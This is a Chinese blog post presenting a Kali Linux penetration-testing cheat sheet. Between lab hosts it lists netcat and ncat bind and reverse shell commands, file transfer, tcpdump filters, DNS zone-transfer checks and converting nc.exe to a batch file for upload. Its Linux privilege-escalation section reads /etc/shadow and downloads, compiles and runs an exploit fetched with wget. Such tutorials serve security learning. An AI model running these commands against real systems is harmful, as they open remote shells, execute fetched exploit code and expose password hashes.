kali渗透测试工具方法

安全工具 2017-10-01

kali作为一个渗透测试者最受欢迎的操作系统,集成了非常多的安全工具,让渗透测试人员更方便的做一些渗透测试工作,本文来自国外某位大神的github,在这里给大家做一个分享,具体内容如下:

Netcat


netcat是一个优秀的网络工具,在业界有“瑞士军刀”的美誉,通常在Linux系统下都自带了。

测试环境

Kali 192.168.2.10

Windows 192.168.2.12

聊天

Windows nc -nlvp 4444

Kali nc -nv 192.168.2.12 4444

正向shell

Windows nc -nlvp 4444 -e cmd.exe

Kali nc -nv 192.168.2.12 4444

反向shell

Windows nc -nlvp 4444

Kali nc -nv 192.168.2.12 4444 -e /bin/bash

文件传输

Windows nc -nlvp 4444 > incoming.exe

Kali nc -nv 192.168.2.12 < /usr/share/windows-binnaries/wget.exe

Ncat


Ncat是nmap工具集的一部分,使用如下命令使用Ncat生成一个正向shell:

Windows ncat -nlvp 4444 -e cmd.exe --allow 192.168.2.10 --ssl

Linux ncat -nv 192.168.2.12 4444 --ssl

tcpdump


tcpdump是Linux下一个网络包截取分析工具。它支持针对网络层、协议、主机、网络或端口的过滤,并提供and、or、not等逻辑语句来帮助你去掉无用的信息。

读取数据包文件

tcpdump -r <capture.pcap>

指定源IP获取数据包文件中的数据

tcpdump -n src host 192.168.2.10 -r <capture.pcap>

指定目的IP获取数据包文件中的数据

tcpdump -n dst host 192.168.2.12 -r <capture.pcap>

指定端口获取数据包文件中的数据

tcpdump -n port 443 -r <capture.pcap>

读取数据包文件并且以16进制显示

tcpdump -nX -r <capture.pcap>

利用host获取dns信息


host是一个用来执行dns查找的小工具。

枚举dns信息

host -t <type> target.com

mx = mail server

ns = name server

测试dns域传送

host -l target.com <DNS server>

EXE转bat


在某些特殊的情况下需要将exe转为bat,便于上传并执行,下面就是如何使用kali将exe转为bat。

cp /usr/share/windows-binaries/nc.exe /root/

cp /usr/share/windows-binaries/exe2bat.exe /root/

upx -9 nc.exe

wine exe2bat.exe nc.exe nc.txt

Linux本地提权


在获得一个webshell之后,一般权限为apache权限,想要进一步的渗透测试需要将自己的权限提升到最高,下面是在Linux下提权使用命令。

ssh user@<target IP>

id # 显示用户和组的权限

cat /etc/shadow # 保存的用户的密码,只有root权限可以查看

cat /etc/issue # 查看系统版本信息

uname -a

如何下载并执行提权exp:

wget -O exploit.c http://www.exploit-db.com/download/18411

gcc -o exploit exploit.c # 编译

./exploit # 执行

id # 查看是否提权成功

cat /etc/shadow # 读取用户密码

总结

这个文章其实有点不想发,但是又没有好文章给大家分享,所以就凑合着给大家看看,毕竟不想浪费今天发文的机会,大家有好的文章不要藏着掖着,发给我有好礼相送呦。最后祝大家国庆节快乐,在玩的同时也别忘了学习呀!


本文由 myh0st 创作,采用 知识共享署名 3.0,可自由转载、引用,但需署名作者且注明文章出处。

楼主残忍的关闭了评论